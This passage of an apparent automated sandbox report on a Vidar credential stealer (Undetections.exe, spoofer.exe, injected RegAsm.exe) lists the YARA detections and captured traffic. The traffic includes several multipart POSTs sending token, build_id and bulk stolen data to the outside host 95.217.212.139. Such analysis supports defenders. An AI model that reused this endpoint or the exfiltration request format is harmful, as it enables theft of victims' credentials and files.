                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 453
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:47 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------BGIJDGCAEBFIIECAKFHICont
                                                                                                                                                                                                          2024-04-10 06:56:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:47 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          28192.168.2.44976895.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:49 UTC329OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJK
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 127537
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:49 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------EGCBAFCFIJJJECBGIIJKCont
                                                                                                                                                                                                          2024-04-10 06:56:49 UTC16355OUTData Raw: 38 66 2f 77 43 49 71 6e 69 4d 48 79 65 7a 35 6c 59 36 6c 68 38 5a 7a 2b 30 35 58 63 30 50 42 33 69 43 61 35 75 39 4b 30 4b 39 79 62 6d 79 75 33 4d 62 64 63 6f 49 5a 51 51 54 37 45 67 66 54 36 56 54 38 62 2f 38 6a 62 64 2f 37 73 66 2f 41 4b 41 74 61 6e 68 66 77 44 71 32 69 2b 49 37 54 55 62 71 34 73 33 69 68 33 37 68 47 37 6c 75 55 4b 6a 47 56 48 71 4f 39 5a 66 6a 66 2f 6b 62 62 7a 36 52 2f 77 44 6f 43 31 79 30 58 53 6c 6a 6b 36 54 75 72 50 37 39 54 54 47 4b 72 48 4c 6d 71 71 73 2b 5a 66 64 6f 63 39 53 55 74 46 65 30 66 4e 43 55 55 74 4a 54 41 31 50 44 66 2f 49 79 36 62 2f 31 38 4a 2f 4f 75 39 73 4a 42 5a 2f 45 76 56 6f 5a 76 6c 61 2b 74 6f 70 59 43 66 34 67 69 37 53 50 72 77 66 79 72 67 76 44 6e 2f 49 79 36 62 2f 31 38 70 2f 4f 76 55 50 45 50 68 2b 50 58
                                                                                                                                                                                                          Data Ascii: 8f/wCIqniMHyez5lY6lh8Zz+05Xc0PB3iCa5u9K0K9ybmyu3MbdcoIZQQT7EgfT6VT8b/8jbd/7sf/AKAtanhfwDq2i+I7TUbq4s3ih37hG7luUKjGVHqO9Zfjf/kbbz6R/wDoC1y0XSljk6TurP79TTGKrHLmqqs+Zfdoc9SUtFe0fNCUUtJTA1PDf/Iy6b/18J/Ou9sJBZ/EvVoZvla+topYCf4gi7SPrwfyrgvDn/Iy6b/18p/OvUPEPh+PX
                                                                                                                                                                                                          2024-04-10 06:56:49 UTC16355OUTData Raw: 62 67 6e 6b 30 74 35 44 71 46 2b 62 50 37 52 39 6e 53 61 78 6b 4c 32 6c 31 61 4b 62 64 6f 4d 6e 4a 43 72 47 56 54 6b 38 35 32 37 76 65 71 57 46 78 63 59 57 36 76 72 66 5a 45 50 48 59 43 56 53 2f 32 56 75 72 62 75 79 47 32 47 70 33 65 6f 58 64 6c 4e 64 32 2b 6e 2b 57 31 76 64 53 42 49 72 64 45 78 74 67 6b 59 41 68 51 4e 32 43 41 63 6e 4a 47 4f 74 4f 30 79 37 6a 75 4e 4a 53 65 38 32 52 69 77 42 76 4a 69 4f 47 6e 67 50 42 54 33 50 6d 62 46 42 37 43 51 2b 6c 53 7a 44 56 70 4c 71 43 34 57 35 73 6f 35 49 53 35 42 6a 73 6f 56 44 62 31 4b 74 75 55 4a 74 62 49 5a 68 38 77 50 55 31 48 50 5a 33 56 77 48 44 50 62 52 43 53 48 79 4a 56 67 74 6f 34 31 61 50 63 47 78 74 56 51 42 79 6f 4f 51 4d 38 56 71 38 4c 69 58 66 6c 30 30 56 74 65 75 75 70 67 73 62 68 50 64 35 2f 65
                                                                                                                                                                                                          Data Ascii: bgnk0t5DqF+bP7R9nSaxkL2l1aKbdoMnJCrGVTk8527veqWFxcYW6vrfZEPHYCVS/2VurbuyG2Gp3eoXdlNd2+n+W1vdSBIrdExtgkYAhQN2CAcnJGOtO0y7juNJSe82RiwBvJiOGngPBT3PmbFB7CQ+lSzDVpLqC4W5so5IS5BjsoVDb1KtuUJtbIZh8wPU1HPZ3VwHDPbRCSHyJVgto41aPcGxtVQByoOQM8Vq8LiXfl00VteuupgsbhPd5/e
                                                                                                                                                                                                          2024-04-10 06:56:49 UTC16355OUTData Raw: 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 53 77 78 37 32 79 65 67 6f 41 52 49 57 66 6e 6f 50 57 70 52 62 72 33 4a 71 61 69 67 64 69 45 32 34 37 4d 66 78 71 42 30 5a 44 79 50 78 71 37 53 4d 6f 5a 63 47 67 4c 46 47 69 6e 4f 70 52 69 70 70 74 41 67 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 4c 6d 6b 66 38 68 71 78 2f 36 2b 49 2f 38 41 30 49 56 36 72 58 6c 6d 6a 4c 76 31 7a 54 31 7a 6a 4e 7a 47 4d 2f 38 41 41 68 58 73 49 73 46 2f 69 6b 50 34 43 76 70 63 69 6d 6f 30 35 33 37 6e 7a 47 66
                                                                                                                                                                                                          Data Ascii: ABRRRQAUUUUAFFFSwx72yegoARIWfnoPWpRbr3JqaigdiE247MfxqB0ZDyPxq7SMoZcGgLFGinOpRipptAgooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKALmkf8hqx/6+I/8A0IV6rXlmjLv1zT1zjNzGM/8AAhXsIsF/ikP4Cvpcimo0537nzGf
                                                                                                                                                                                                          2024-04-10 06:56:49 UTC16355OUTData Raw: 2f 41 41 71 48 39 4b 37 72 36 48 52 48 59 52 6a 54 54 53 39 36 54 71 61 6d 35 59 68 77 4f 39 4e 49 70 53 66 78 70 50 77 70 46 43 5a 77 65 39 4a 67 6b 55 70 35 70 43 66 57 70 59 30 47 61 61 65 4b 63 63 6d 6d 30 68 69 64 50 72 53 5a 2f 77 41 6d 6c 49 35 36 30 30 38 55 69 6b 49 52 36 30 47 6a 2f 43 69 6b 4d 54 38 4b 4f 33 76 39 4b 4f 77 70 44 51 4d 55 38 39 61 54 47 50 70 52 52 53 47 65 67 55 55 74 46 59 6e 79 5a 75 2b 45 50 2b 51 36 50 2b 75 62 66 30 72 76 6d 67 46 30 72 51 6c 33 6a 33 44 68 30 4f 47 55 39 69 50 63 47 76 4b 62 65 34 6d 74 4a 31 6d 67 6b 4b 53 4b 65 47 46 64 5a 46 34 78 41 30 35 70 57 69 58 37 5a 48 6a 35 43 53 46 63 5a 41 4a 42 48 53 76 6b 38 37 79 33 45 56 63 58 54 78 46 4e 58 57 69 39 4e 66 79 50 72 38 67 7a 54 44 55 63 4c 4f 68 56 64 6e
                                                                                                                                                                                                          Data Ascii: /AAqH9K7r6HRHYRjTTS96Tqam5YhwO9NIpSfxpPwpFCZwe9JgkUp5pCfWpY0GaaeKccmm0hidPrSZ/wAmlI56008UikIR60Gj/CikMT8KO3v9KOwpDQMU89aTGPpRRSGegUUtFYnyZu+EP+Q6P+ubf0rvmgF0rQl3j3Dh0OGU9iPcGvKbe4mtJ1mgkKSKeGFdZF4xA05pWiX7ZHj5CSFcZAJBHSvk87y3EVcXTxFNXWi9NfyPr8gzTDUcLOhVdn
                                                                                                                                                                                                          2024-04-10 06:56:49 UTC16355OUTData Raw: 6b 32 78 2b 33 79 6f 47 50 2b 2b 50 53 72 34 6e 68 4a 77 4a 55 4a 2f 77 42 34 56 32 59 66 46 77 72 75 58 4c 30 64 6a 7a 63 5a 6c 39 58 43 63 71 71 62 79 56 2f 51 6b 6f 6f 71 6e 65 58 4c 78 78 33 63 43 52 37 70 5a 4c 52 35 49 43 46 42 62 7a 49 79 48 49 48 31 52 58 46 61 31 71 71 70 51 63 33 30 4d 4d 4e 51 65 49 71 71 6c 48 64 6c 79 69 73 53 35 31 4a 6c 66 57 62 64 59 59 74 31 68 63 32 4e 70 35 67 55 5a 4c 6c 4a 54 4b 63 2b 37 67 6a 36 4b 50 53 72 31 39 72 46 7a 70 57 6c 58 46 78 39 6e 73 4a 74 79 74 62 32 55 55 6c 70 45 7a 53 53 2f 77 41 54 6c 69 68 59 68 41 63 39 66 76 46 52 30 79 4b 34 6c 6d 4d 58 43 55 34 72 5a 32 39 62 37 48 70 79 79 57 70 43 74 47 6c 4f 56 72 71 2f 70 33 76 36 46 32 69 73 6c 4e 59 6d 47 6f 32 2b 6c 54 57 31 6d 4c 55 36 4b 6b 37 53 4c
                                                                                                                                                                                                          Data Ascii: k2x+3yoGP++PSr4nhJwJUJ/wB4V2YfFwruXL0djzcZl9XCcqqbyV/QkooqneXLxx3cCR7pZLR5ICFBbzIyHIH1RXFa1qqpQc30MMNQeIqqlHdlyisS51JlfWbdYYt1hc2Np5gUZLlJTKc+7gj6KPSr19rFzpWlXFx9nsJtytb2UUlpEzSS/wATlihYhAc9fvFR0yK4lmMXCU4rZ29b7HpyyWpCtGlOVrq/p3v6F2islNYmGo2+lTW1mLU6Kk7SL
                                                                                                                                                                                                          2024-04-10 06:56:49 UTC16355OUTData Raw: 4e 4a 6e 2f 4a 70 67 48 58 36 65 39 49 63 34 36 55 70 36 39 61 51 6d 6b 4d 54 36 30 55 76 57 6b 36 39 71 59 78 44 31 6f 36 64 4f 50 70 53 2f 53 6b 37 2f 41 4f 46 41 7a 30 53 69 69 69 73 7a 35 45 4b 4b 30 64 47 30 6c 74 59 75 35 4c 64 5a 52 47 55 6a 4d 6d 53 75 63 34 49 47 4f 76 76 57 70 2f 77 69 52 44 46 57 76 43 43 4f 6f 4d 58 2f 41 4e 65 76 4e 78 57 62 59 50 43 54 39 6e 57 6e 5a 2b 6a 66 35 49 39 4c 43 35 52 6a 63 58 54 39 70 52 68 64 65 71 58 35 73 35 71 69 75 6f 48 67 2f 50 38 41 79 2f 38 41 2f 6b 48 2f 41 4f 79 71 44 55 76 44 48 39 6e 36 64 4c 64 2f 62 50 4d 38 76 48 79 2b 56 6a 4f 53 42 31 7a 37 31 6c 53 7a 33 4c 36 73 31 54 68 55 75 32 37 4c 53 57 37 2b 52 72 56 79 48 4d 4b 55 48 55 6e 54 73 6b 72 76 57 4f 79 2b 5a 7a 31 46 46 46 65 75 65 51 46 46
                                                                                                                                                                                                          Data Ascii: NJn/JpgHX6e9Ic46Up69aQmkMT60UvWk69qYxD1o6dOPpS/Sk7/AOFAz0Siiisz5EKK0dG0ltYu5LdZRGUjMmSuc4IGOvvWp/wiRDFWvCCOoMX/ANevNxWbYPCT9nWnZ+jf5I9LC5RjcXT9pRhdeqX5s5qiuoHg/P8Ay/8A/kH/AOyqDUvDH9n6dLd/bPM8vHy+VjOSB1z71lSz3L6s1ThUu27LSW7+RrVyHMKUHUnTskrvWOy+Zz1FFFeueQFF
                                                                                                                                                                                                          2024-04-10 06:56:49 UTC13052OUTData Raw: 65 34 70 76 4c 4a 79 58 76 53 31 31 76 35 33 2f 41 4d 75 6e 59 6d 4f 64 30 6f 50 33 59 61 4b 31 72 39 4f 2f 33 39 65 35 58 30 37 53 72 37 54 4e 51 73 66 37 56 58 55 62 56 35 59 62 7a 7a 66 4e 69 4f 57 49 74 35 63 73 6f 59 6a 65 52 7a 7a 6e 48 49 35 35 72 50 73 35 72 36 37 6a 67 73 74 4f 30 2f 55 39 56 30 75 50 53 2f 73 6b 32 49 39 6c 33 4b 76 6d 2b 5a 76 55 4c 76 32 62 57 49 41 48 7a 6a 41 35 36 38 61 54 61 44 59 76 6a 63 6a 45 4b 63 67 45 31 5a 6e 30 2b 33 6e 68 57 4a 77 64 71 6a 41 41 4e 4f 57 57 79 6e 4c 6d 6b 2b 69 32 38 72 2f 35 69 68 6e 55 4b 63 56 43 45 58 75 37 33 74 31 31 30 30 48 51 57 36 32 64 31 64 32 61 58 4c 33 49 74 35 42 48 35 6a 34 33 63 41 63 48 42 49 79 4f 68 78 33 42 70 5a 32 57 44 66 65 54 37 76 73 4e 76 45 7a 58 69 68 53 52 4a 45 52
                                                                                                                                                                                                          Data Ascii: e4pvLJyXvS11v53/AMunYmOd0oP3YaK1r9O/39e5X07Sr7TNQsf7VXUbV5YbzzfNiOWIt5csoYjeRzznHI55rPs5r67jgstO0/U9V0uPS/sk2I9l3Kvm+ZvULv2bWIAHzjA568aTaDYvjcjEKcgE1Zn0+3nhWJwdqjAANOWWynLmk+i28r/5ihnUKcVCEXu73t1100HQW62d1d2aXL3It5BH5j43cAcHBIyOhx3BpZ2WDfeT7vsNvEzXihSRJER
                                                                                                                                                                                                          2024-04-10 06:56:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:50 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          29192.168.2.44976995.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:51 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJ
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:51 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------JKKEHJDHJKFIECAAKFIJCont
                                                                                                                                                                                                          2024-04-10 06:56:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:52 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          30192.168.2.44977095.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:52 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHI
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:52 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 32 61 61 62 61 62 30 33 61 35 62 32 30 39 39 35 61 30 33 65 33 65 30 33 37 38 30 65 62 64 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 31 31 62 39 30 37 64 35 37 35 61 36 36 33 35 31 35 65 66 32 34 38 30 34 63 63 34 39 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                          Data Ascii: ------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="token"a2aabab03a5b20995a03e3e03780ebd6------EHCBAAAFHJDHJJKEBGHIContent-Disposition: form-data; name="build_id"911b907d575a663515ef24804cc499f0------EHCBAAAFHJDHJJKEBGHICont
                                                                                                                                                                                                          2024-04-10 06:56:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:53 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2024-04-10 06:56:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:08:56:02
                                                                                                                                                                                                          Start date:10/04/2024
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Undetections.exe"
                                                                                                                                                                                                          Imagebase:0x430000
                                                                                                                                                                                                          File size:1'800'192 bytes
                                                                                                                                                                                                          MD5 hash:3AF8847A68F187E5425AF04CFE48D1CF
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1639618593.0000000000478000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                          Start time:08:56:13
                                                                                                                                                                                                          Start date:10/04/2024
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Undetections\spoofer.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Undetections\spoofer.exe"
                                                                                                                                                                                                          Imagebase:0xc40000
                                                                                                                                                                                                          File size:219'136 bytes
                                                                                                                                                                                                          MD5 hash:96EF850D149542B53F033375B1C50CC9
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                          • Detection: 61%, ReversingLabs
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                          Start time:08:56:13
                                                                                                                                                                                                          Start date:10/04/2024
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                          Start time:08:56:14
                                                                                                                                                                                                          Start date:10/04/2024
                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                          Imagebase:0x760000
                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:13%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:99.6%
                                                                                                                                                                                                            Signature Coverage:2.2%
                                                                                                                                                                                                            Total number of Nodes:539
                                                                                                                                                                                                            Total number of Limit Nodes:45
